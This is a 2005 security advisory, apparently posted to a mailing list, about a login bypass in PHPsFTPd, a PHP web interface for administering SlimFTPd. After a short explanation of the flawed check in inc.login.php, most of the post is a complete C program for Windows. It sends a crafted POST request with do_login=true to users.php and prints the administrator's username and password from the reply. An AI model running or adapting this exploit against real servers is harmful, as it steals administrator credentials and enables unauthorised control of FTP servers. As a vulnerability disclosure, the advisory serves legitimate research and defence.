Author: Stefan Lochbihler Date: 11. Juli 2005 Affected Software: PHPsFTPd Software Version: 0.2 -> 0.4 Software URL: http://phpsftpd.sourceforge.net/ Attack: Admin password leak about PHPsFTPd: PHPsFTPd is a web based administration and configuration interface for the SLimFTPd ftp serverIt can be used an any http server that suports PHP and does not need a database or adittional php modules, only SlimFTPD It allows the administrators of the ftp server to configurate it from within this interface as opposed to its native ascii conf.file It shows statistics about the users that accesed the server , the files that were downloaded , server breakdowns etc Hi there again during a look at the code of the PHPsFTPd Project i find out that it is possible to get the Admins Username & Password. This happens when we send a specially crafted POST Request to the user.php script. The reason of the leakness is at the inc.login.php script. When you take a look at the code below you see that the code will exit if there is no logged session or we dont try to logout. But when we POST the do_login var with some stuff in it execution goes on. snipped from inc.login.php //login form if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) && !isset($_POST['do_login'])) { echo "

 

Please login with admin pass
"; die; } exploit: Print the admins username & password // PHPsFTPd Admin Password Leak // tested on a WinXP SP1 box #include "stdafx.h" #include "stdio.h" #include "winsock2.h" #pragma comment (lib,"ws2_32") #define PORT 80 #define rootdir "/phpsftpd/" typedef unsigned long ulong; void usage(char *); ulong checkhost(char *); ulong checkhost(char *host) { struct hostent *hp; ulong host_ip=0; host_ip=inet_addr(host); if(host_ip==INADDR_NONE){ hp=gethostbyname(host); if(!hp){ printf("unable to resolv host...\n"); exit(1); } host_ip= *(ulong*)hp->h_addr; } return host_ip; } void usage (char *progn){ printf("Usage[%s]: www.targethost.com\n",progn); exit(0); } int main(int argc, char* argv[]) { WSADATA wsa; SOCKET client; WORD wsVersion; char httpRequest[1024]; char recvBuffer[1024]; char *p; struct sockaddr_in addr; int err=0,recvSize=0; printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:steve01@chello.at\n"); if(argc<2) usage(argv[0]); wsVersion=MAKEWORD(2,0); if(err=WSAStartup(wsVersion,&wsa)){ printf("Error: WSAStartup\n"); exit(0); } client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(client==INVALID_SOCKET){ printf("Error: Create Socket\n"); exit(0); } addr.sin_addr.s_addr = checkhost(argv[1]); addr.sin_port = htons(PORT); addr.sin_family = AF_INET; memset(httpRequest,'\0',sizeof(httpRequest)); strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1); strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1); strncat(httpRequest,"users.php?action=edit&username=root HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1); strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1); strncat(httpRequest,"Host: www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1); strncat(httpRequest,"Content-Type: application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1); strncat(httpRequest,"Content-Length: 13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1); strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1); strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1); err=connect(client,(SOCKADDR*)&addr,sizeof(addr)); //Get Http Stuff send(client,httpRequest,strlen(httpRequest),0); recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0); recvBuffer[recvSize]='\0'; //Get username & password recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0); recvBuffer[recvSize]='\0'; //shit when anyone use a 0x20 on his password p=strstr(recvBuffer,"value="); printf("Username:"); for(p=p+6;*p!=0x20;p++) putc(*p,stdout); p=strstr(p,"value="); printf("\n"); printf("Password:"); for(p=p+6;*p!=0x20;p++) putc(*p,stdout); closesocket(client); WSACleanup(); printf("\n"); return 0; } Vendor Status: The Vendor is informed ! Discovered (c) by Steve -- Erstellt mit Operas revolutionärem E-Mail-Modul: http://www.opera.com/m2/